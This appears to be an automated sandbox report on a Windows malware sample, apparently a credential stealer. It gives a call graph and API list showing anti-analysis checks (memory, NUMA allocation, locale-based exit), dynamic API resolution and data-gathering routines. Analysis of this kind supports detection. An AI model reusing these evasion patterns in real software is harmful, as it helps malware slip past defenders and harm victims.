30257->30260 30265 7f18af 30260->30265 30261 7f18b8 
CreateToolhelp32Snapshot 30262 7f18d4 Module32First 30261->30262 30261->30265 30263 7f18e3 30262->30263 30266 7f110c 30262->30266 30267 7f1553 30263->30267 30265->30261 30265->30262 30268 7f157e 30267->30268 30269 7f158f VirtualAlloc 30268->30269 30270 7f15c7 30268->30270 30269->30270 30270->30270 30291 2306ebc VirtualProtect 30385 41abd0 free std::exception::_Tidy ctype 30386 231cd90 173 API calls 3 library calls 30348 231140b StrCmpCA strtok_s 30387 413916 91 API calls 2 library calls 30388 4183dc 15 API calls 30349 231d0af RtlLeaveCriticalSection _raise 30292 23132ae 22 API calls 30293 231ae93 43 API calls 2 library calls 30294 2310297 149 API calls 30295 4090e7 memcpy RaiseException codecvt __CxxThrowException@8 30350 41ceea SetUnhandledExceptionFilter 28811 4169f0 28854 402260 28811->28854 28828 417850 3 API calls 28829 416a30 28828->28829 28830 4178e0 3 API calls 28829->28830 28831 416a43 28830->28831 28987 41a9b0 28831->28987 28833 416a64 28834 41a9b0 4 API calls 28833->28834 28835 416a6b 28834->28835 28836 41a9b0 4 API calls 28835->28836 28837 416a72 28836->28837 28838 41a9b0 4 API calls 28837->28838 28839 416a79 28838->28839 28840 41a9b0 4 API calls 28839->28840 28841 416a80 28840->28841 28995 41a8a0 28841->28995 28843 416a89 28844 416b0c 28843->28844 28846 416ac2 OpenEventA 28843->28846 28999 416920 GetSystemTime 28844->28999 28848 416af5 CloseHandle Sleep 28846->28848 28849 416ad9 28846->28849 28851 416b0a 28848->28851 28853 416ae1 CreateEventA 28849->28853 28851->28843 28852 416b16 CloseHandle ExitProcess 28853->28844 29196 4045c0 17 API calls 28854->29196 28856 402274 28857 4045c0 34 API calls 28856->28857 28858 40228d 28857->28858 28859 4045c0 34 API calls 28858->28859 28860 4022a6 28859->28860 28861 4045c0 34 API calls 28860->28861 28862 4022bf 28861->28862 28863 4045c0 34 API calls 28862->28863 28864 4022d8 28863->28864 28865 4045c0 34 API calls 28864->28865 28866 4022f1 28865->28866 28867 4045c0 34 API calls 28866->28867 28868 40230a 28867->28868 
28869 4045c0 34 API calls 28868->28869 28870 402323 28869->28870 28871 4045c0 34 API calls 28870->28871 28872 40233c 28871->28872 28873 4045c0 34 API calls 28872->28873 28874 402355 28873->28874 28875 4045c0 34 API calls 28874->28875 28876 40236e 28875->28876 28877 4045c0 34 API calls 28876->28877 28878 402387 28877->28878 28879 4045c0 34 API calls 28878->28879 28880 4023a0 28879->28880 28881 4045c0 34 API calls 28880->28881 28882 4023b9 28881->28882 28883 4045c0 34 API calls 28882->28883 28884 4023d2 28883->28884 28885 4045c0 34 API calls 28884->28885 28886 4023eb 28885->28886 28887 4045c0 34 API calls 28886->28887 28888 402404 28887->28888 28889 4045c0 34 API calls 28888->28889 28890 40241d 28889->28890 28891 4045c0 34 API calls 28890->28891 28892 402436 28891->28892 28893 4045c0 34 API calls 28892->28893 28894 40244f 28893->28894 28895 4045c0 34 API calls 28894->28895 28896 402468 28895->28896 28897 4045c0 34 API calls 28896->28897 28898 402481 28897->28898 28899 4045c0 34 API calls 28898->28899 28900 40249a 28899->28900 28901 4045c0 34 API calls 28900->28901 28902 4024b3 28901->28902 28903 4045c0 34 API calls 28902->28903 28904 4024cc 28903->28904 28905 4045c0 34 API calls 28904->28905 28906 4024e5 28905->28906 28907 4045c0 34 API calls 28906->28907 28908 4024fe 28907->28908 28909 4045c0 34 API calls 28908->28909 28910 402517 28909->28910 28911 4045c0 34 API calls 28910->28911 28912 402530 28911->28912 28913 4045c0 34 API calls 28912->28913 28914 402549 28913->28914 28915 4045c0 34 API calls 28914->28915 28916 402562 28915->28916 28917 4045c0 34 API calls 28916->28917 28918 40257b 28917->28918 28919 4045c0 34 API calls 28918->28919 28920 402594 28919->28920 28921 4045c0 34 API calls 28920->28921 28922 4025ad 28921->28922 28923 4045c0 34 API calls 28922->28923 28924 4025c6 28923->28924 28925 4045c0 34 API calls 28924->28925 28926 4025df 28925->28926 28927 4045c0 34 API calls 28926->28927 28928 4025f8 28927->28928 28929 4045c0 34 API calls 28928->28929 28930 
402611 28929->28930 28931 4045c0 34 API calls 28930->28931 28932 40262a 28931->28932 28933 4045c0 34 API calls 28932->28933 28934 402643 28933->28934 28935 4045c0 34 API calls 28934->28935 28936 40265c 28935->28936 28937 4045c0 34 API calls 28936->28937 28938 402675 28937->28938 28939 4045c0 34 API calls 28938->28939 28940 40268e 28939->28940 28941 419860 28940->28941 29200 419750 GetPEB 28941->29200 28943 419868 28944 419a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 28943->28944 28945 41987a 28943->28945 28946 419af4 GetProcAddress 28944->28946 28947 419b0d 28944->28947 28948 41988c 21 API calls 28945->28948 28946->28947 28949 419b46 28947->28949 28950 419b16 GetProcAddress GetProcAddress 28947->28950 28948->28944 28951 419b68 28949->28951 28952 419b4f GetProcAddress 28949->28952 28950->28949 28953 419b71 GetProcAddress 28951->28953 28954 419b89 28951->28954 28952->28951 28953->28954 28955 416a00 28954->28955 28956 419b92 GetProcAddress GetProcAddress 28954->28956 28957 41a740 28955->28957 28956->28955 28958 41a750 28957->28958 28959 416a0d 28958->28959 28960 41a77e lstrcpy 28958->28960 28961 4011d0 28959->28961 28960->28959 28962 4011e8 28961->28962 28963 401217 28962->28963 28964 40120f ExitProcess 28962->28964 28965 401160 GetSystemInfo 28963->28965 28966 401184 28965->28966 28967 40117c ExitProcess 28965->28967 28968 401110 GetCurrentProcess VirtualAllocExNuma 28966->28968 28969 401141 ExitProcess 28968->28969 28970 401149 28968->28970 29201 4010a0 VirtualAlloc 28970->29201 28973 401220 29205 4189b0 28973->29205 28976 40129a 28979 416770 GetUserDefaultLangID 28976->28979 28977 401292 ExitProcess 28978 401249 __aulldiv 28978->28976 28978->28977 28980 4167d3 GetUserDefaultLCID 28979->28980 28981 416792 28979->28981 28980->28828 28981->28980 28982 4167c1 ExitProcess 28981->28982 28983 4167a3 ExitProcess 28981->28983 28984 4167b7 ExitProcess 28981->28984 28985 4167cb ExitProcess 28981->28985 28986 4167ad ExitProcess 28981->28986 29207 41a710 
28987->29207 28989 41a9c1 lstrlenA 28991 41a9e0 28989->28991 28990 41aa18 29208 41a7a0 28990->29208 28991->28990 28993 41a9fa lstrcpy lstrcatA 28991->28993 28993->28990 28994 41aa24 28994->28833 28996 41a8bb 28995->28996 28997 41a90b 28996->28997 28998 41a8f9 lstrcpy 28996->28998 28997->28843 28998->28997 29212 416820 28999->29212 29001 41698e 29002 416998 sscanf 29001->29002 29241 41a800 29002->29241 29004 4169aa SystemTimeToFileTime SystemTimeToFileTime 29005 4169e0 29004->29005 29006 4169ce 29004->29006 29008 415b10 29005->29008 29006->29005 29007 4169d8 ExitProcess 29006->29007 29009 415b1d 29008->29009 29010 41a740 lstrcpy 29009->29010 29011 415b2e 29010->29011 29243 41a820 lstrlenA 29011->29243 29014 41a820 2 API calls 29015 415b64 29014->29015 29016 41a820 2 API calls 29015->29016 29017 415b74 29016->29017 29247 416430 29017->29247 29020 41a820 2 API calls 29021 415b93 29020->29021 29022 41a820 2 API calls 29021->29022 29023 415ba0 29022->29023 29024 41a820 2 API calls 29023->29024 29025 415bad 29024->29025 29026 41a820 2 API calls 29025->29026 29027 415bf9 29026->29027 29256 4026a0 29027->29256 29035 415cc3 29036 416430 lstrcpy 29035->29036 29037 415cd5 29036->29037 29038 41a7a0 lstrcpy 29037->29038 29039 415cf2 29038->29039 29040 41a9b0 4 API calls 29039->29040 29041 415d0a 29040->29041 29042 41a8a0 lstrcpy 29041->29042 29043 415d16 29042->29043 29044 41a9b0 4 API calls 29043->29044 29045 415d3a 29044->29045 29046 41a8a0 lstrcpy 29045->29046 29047 415d46 29046->29047 29048 41a9b0 4 API calls 29047->29048 29049 415d6a 29048->29049 29050 41a8a0 lstrcpy 29049->29050 29051 415d76 29050->29051 29052 41a740 lstrcpy 29051->29052 29053 415d9e 29052->29053 29982 417500 GetWindowsDirectoryA 29053->29982 29056 41a7a0 lstrcpy 29057 415db8 29056->29057 29992 404880 29057->29992 29059 415dbe 30138 4117a0 29059->30138 29061 415dc6 29062 41a740 lstrcpy 29061->29062 29063 415de9 29062->29063 29064 401590 lstrcpy 29063->29064 29065 415dfd 29064->29065 30158 405960 39 API 
calls ctype 29065->30158 29067 415e03 30159 411050 strtok_s strtok_s lstrlenA lstrcpy 29067->30159 29069 415e0e 29070 41a740 lstrcpy 29069->29070 29071 415e32 29070->29071 29072 401590 lstrcpy 29071->29072 29073 415e46 29072->29073 30160 405960 39 API calls ctype 29073->30160 29075 415e4c 30161 410d90 7 API calls 29075->30161 29077 415e57 29078 41a740 lstrcpy 29077->29078 29079 415e79 29078->29079 29080 401590 lstrcpy 29079->29080 29081 415e8d 29080->29081 30162 405960 39 API calls ctype 29081->30162 29083 415e93 30163 410f40 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 29083->30163 29085 415e9e 29086 401590 lstrcpy 29085->29086 29087 415eb5 29086->29087 30164 411a10 121 API calls 29087->30164 29089 415eba 29090 41a740 lstrcpy 29089->29090 29091 415ed6 29090->29091 30165 404fb0 8 API calls 29091->30165 29093 415edb 29094 401590 lstrcpy 29093->29094 29095 415f5b 29094->29095 30166 410740 292 API calls 29095->30166 29097 415f60 29098 41a740 lstrcpy 29097->29098 29099 415f86 29098->29099 29100 401590 lstrcpy 29099->29100 29101 415f9a 29100->29101 30167 405960 39 API calls ctype 29101->30167 29103 415fa0 30168 411170 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 29103->30168 29105 415fab 29106 401590 lstrcpy 29105->29106 29107 415feb 29106->29107 30169 401e80 67 API calls 29107->30169 29109 415ff0 29110 416000 29109->29110 29111 416092 29109->29111 29113 41a740 lstrcpy 29110->29113 29112 41a7a0 lstrcpy 29111->29112 29114 4160a5 29112->29114 29115 416020 29113->29115 29116 401590 lstrcpy 29114->29116 29117 401590 lstrcpy 29115->29117 29118 4160b9 29116->29118 29119 416034 29117->29119 30173 405960 39 API calls ctype 29118->30173 30170 405960 39 API calls ctype 29119->30170 29122 4160bf 30174 413560 36 API calls 29122->30174 29123 41603a 30171 4112d0 21 API calls ctype 29123->30171 29126 41608a 29131 401590 lstrcpy 29126->29131 29159 41610b 29126->29159 29127 416045 29128 401590 lstrcpy 29127->29128 29129 416085 29128->29129 30172 413dc0 75 API calls 29129->30172 29130 
416130 29136 401590 lstrcpy 29130->29136 29151 416155 29130->29151 29134 4160e7 29131->29134 29133 401590 lstrcpy 29135 41612b 29133->29135 30175 4140b0 64 API calls ctype 29134->30175 30177 414780 116 API calls ctype 29135->30177 29140 416150 29136->29140 29138 401590 lstrcpy 29143 416175 29138->29143 30178 414bb0 67 API calls ctype 29140->30178 29141 4160ec 29142 401590 lstrcpy 29141->29142 29146 416106 29142->29146 30179 414d70 75 API calls 29143->30179 29144 401590 lstrcpy 29149 41619a 29144->29149 30176 415100 71 API calls 29146->30176 29147 4161e9 29155 416210 29147->29155 29161 401590 lstrcpy 29147->29161 30180 414f40 69 API calls ctype 29149->30180 29150 401590 lstrcpy 29157 4161bf 29150->29157 29151->29138 29154 41617a 29151->29154 29153 401590 lstrcpy 29160 4161e4 29153->29160 29154->29144 29162 41619f 29154->29162 29163 416220 29155->29163 29164 4162b3 29155->29164 30181 407710 125 API calls ctype 29157->30181 29159->29130 29159->29133 30182 415050 67 API calls ctype 29160->30182 29168 416209 29161->29168 29162->29150 29166 4161c4 29162->29166 29165 41a740 lstrcpy 29163->29165 29169 41a7a0 lstrcpy 29164->29169 29170 416241 29165->29170 29166->29147 29166->29153 30183 419010 54 API calls ctype 29168->30183 29172 4162c6 29169->29172 29173 401590 lstrcpy 29170->29173 29174 401590 lstrcpy 29172->29174 29176 416255 29173->29176 29175 4162da 29174->29175 30187 405960 39 API calls ctype 29175->30187 30184 405960 39 API calls ctype 29176->30184 29179 4162e0 30188 413560 36 API calls 29179->30188 29180 41625b 30185 4112d0 21 API calls ctype 29180->30185 29183 4162ab 29186 41a7a0 lstrcpy 29183->29186 29184 416266 29185 401590 lstrcpy 29184->29185 29187 4162a6 29185->29187 29188 4162fc 29186->29188 30186 413dc0 75 API calls 29187->30186 29190 401590 lstrcpy 29188->29190 29191 416310 29190->29191 30189 405960 39 API calls ctype 29191->30189 29193 41631c 29195 416338 29193->29195 30190 416630 9 API calls ctype 29193->30190 29195->28852 29197 404697 29196->29197 29198 
4046ac 11 API calls 29197->29198 29199 40474f 6 API calls 29197->29199 29198->29197 29199->28856 29200->28943 29203 4010c2 ctype 29201->29203 29202 4010fd 29202->28973 29203->29202 29204 4010e2 VirtualFree 29203->29204 29204->29202 29206 401233 GlobalMemoryStatusEx 29205->29206 29206->28978 29207->28989 29209 41a7c2 29208->29209 29210 41a7ec 29209->29210 29211 41a7da lstrcpy 29209->29211 29210->28994 29211->29210 29213 41a740 lstrcpy 29212->29213 29214 416833 29213->29214 29215 41a9b0 4 API calls 29214->29215 29216 416845 29215->29216 29217 41a8a0 lstrcpy 29216->29217 29218 41684e 29217->29218 29219 41a9b0 4 API calls 29218->29219 29220 416867 29219->29220 29221 41a8a0 lstrcpy 29220->29221 29222 416870 29221->29222 29223 41a9b0 4 API calls 29222->29223 29224 41688a 29223->29224 29225 41a8a0 lstrcpy 29224->29225 29226 416893 29225->29226 29227 41a9b0 4 API calls 29226->29227 29228 4168ac 29227->29228 29229 41a8a0 lstrcpy 29228->29229 29230 4168b5 29229->29230 29231 41a9b0 4 API calls 29230->29231 29232 4168cf 29231->29232 29233 41a8a0 lstrcpy 29232->29233 29234 4168d8 29233->29234 29235 41a9b0 4 API calls 29234->29235 29236 4168f3 29235->29236 29237 41a8a0 lstrcpy 29236->29237 29238 4168fc 29237->29238 29239 41a7a0 lstrcpy 29238->29239 29240 416910 29239->29240 29240->29001 29242 41a812 29241->29242 29242->29004 29244 41a83f 29243->29244 29245 415b54 29244->29245 29246 41a87b lstrcpy 29244->29246 29245->29014 29246->29245 29248 41a8a0 lstrcpy 29247->29248 29249 416443 29248->29249 29250 41a8a0 lstrcpy 29249->29250 29251 416455 29250->29251 29252 41a8a0 lstrcpy 29251->29252 29253 416467 29252->29253 29254 41a8a0 lstrcpy 29253->29254 29255 415b86 29254->29255 29255->29020 29257 4045c0 34 API calls 29256->29257 29258 4026b4 29257->29258 29259 4045c0 34 API calls 29258->29259 29260 4026d7 29259->29260 29261 4045c0 34 API calls 29260->29261 29262 4026f0 29261->29262 29263 4045c0 34 API calls 29262->29263 29264 402709 29263->29264 29265 4045c0 34 API calls 29264->29265 
29266 402736 29265->29266 29267 4045c0 34 API calls 29266->29267 29268 40274f 29267->29268 29269 4045c0 34 API calls 29268->29269 29270 402768 29269->29270 29271 4045c0 34 API calls 29270->29271 29272 402795 29271->29272 29273 4045c0 34 API calls 29272->29273 29274 4027ae 29273->29274 29275 4045c0 34 API calls 29274->29275 29276 4027c7 29275->29276 29277 4045c0 34 API calls 29276->29277 29278 4027e0 29277->29278 29279 4045c0 34 API calls 29278->29279 29280 4027f9 29279->29280 29281 4045c0 34 API calls 29280->29281 29282 402812 29281->29282 29283 4045c0 34 API calls 29282->29283 29284 40282b 29283->29284 29285 4045c0 34 API calls 29284->29285 29286 402844 29285->29286 29287 4045c0 34 API calls 29286->29287 29288 40285d 29287->29288 29289 4045c0 34 API calls 29288->29289 29290 402876 29289->29290 29291 4045c0 34 API calls 29290->29291 29292 40288f 29291->29292 29293 4045c0 34 API calls 29292->29293 29294 4028a8 29293->29294 29295 4045c0 34 API calls 29294->29295 29296 4028c1 29295->29296 29297 4045c0 34 API calls 29296->29297 29298 4028da 29297->29298 29299 4045c0 34 API calls 29298->29299 29300 4028f3 29299->29300 29301 4045c0 34 API calls 29300->29301 29302 40290c 29301->29302 29303 4045c0 34 API calls 29302->29303 29304 402925 29303->29304 29305 4045c0 34 API calls 29304->29305 29306 40293e 29305->29306 29307 4045c0 34 API calls 29306->29307 29308 402957 29307->29308 29309 4045c0 34 API calls 29308->29309 29310 402970 29309->29310 29311 4045c0 34 API calls 29310->29311 29312 402989 29311->29312 29313 4045c0 34 API calls 29312->29313 29314 4029a2 29313->29314 29315 4045c0 34 API calls 29314->29315 29316 4029bb 29315->29316 29317 4045c0 34 API calls 29316->29317 29318 4029d4 29317->29318 29319 4045c0 34 API calls 29318->29319 29320 4029ed 29319->29320 29321 4045c0 34 API calls 29320->29321 29322 402a06 29321->29322 29323 4045c0 34 API calls 29322->29323 29324 402a1f 29323->29324 29325 4045c0 34 API calls 29324->29325 29326 402a38 29325->29326 29327 4045c0 34 API 
calls 29326->29327 29328 402a51 29327->29328 29329 4045c0 34 API calls 29328->29329 29330 402a6a 29329->29330 29331 4045c0 34 API calls 29330->29331 29332 402a83 29331->29332 29333 4045c0 34 API calls 29332->29333 29334 402a9c 29333->29334 29335 4045c0 34 API calls 29334->29335 29336 402ab5 29335->29336 29337 4045c0 34 API calls 29336->29337 29338 402ace 29337->29338 29339 4045c0 34 API calls 29338->29339 29340 402ae7 29339->29340 29341 4045c0 34 API calls 29340->29341 29342 402b00 29341->29342 29343 4045c0 34 API calls 29342->29343 29344 402b19 29343->29344 29345 4045c0 34 API calls 29344->29345 29346 402b32 29345->29346 29347 4045c0 34 API calls 29346->29347 29348 402b4b 29347->29348 29349 4045c0 34 API calls 29348->29349 29350 402b64 29349->29350 29351 4045c0 34 API calls 29350->29351 29352 402b7d 29351->29352 29353 4045c0 34 API calls 29352->29353 29354 402b96 29353->29354 29355 4045c0 34 API calls 29354->29355 29356 402baf 29355->29356 29357 4045c0 34 API calls 29356->29357 29358 402bc8 29357->29358 29359 4045c0 34 API calls 29358->29359 29360 402be1 29359->29360 29361 4045c0 34 API calls 29360->29361 29362 402bfa 29361->29362 29363 4045c0 34 API calls 29362->29363 29364 402c13 29363->29364 29365 4045c0 34 API calls 29364->29365 29366 402c2c 29365->29366 29367 4045c0 34 API calls 29366->29367 29368 402c45 29367->29368 29369 4045c0 34 API calls 29368->29369 29370 402c5e 29369->29370 29371 4045c0 34 API calls 29370->29371 29372 402c77 29371->29372 29373 4045c0 34 API calls 29372->29373 29374 402c90 29373->29374 29375 4045c0 34 API calls 29374->29375 29376 402ca9 29375->29376 29377 4045c0 34 API calls 29376->29377 29378 402cc2 29377->29378 29379 4045c0 34 API calls 29378->29379 29380 402cdb 29379->29380 29381 4045c0 34 API calls 29380->29381 29382 402cf4 29381->29382 29383 4045c0 34 API calls 29382->29383 29384 402d0d 29383->29384 29385 4045c0 34 API calls 29384->29385 29386 402d26 29385->29386 29387 4045c0 34 API calls 29386->29387 29388 402d3f 29387->29388 

                                      Control-flow Graph

                                      APIs
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                                      • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                                      • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                                      • strlen.MSVCRT ref: 004046F0
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                                      Strings
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
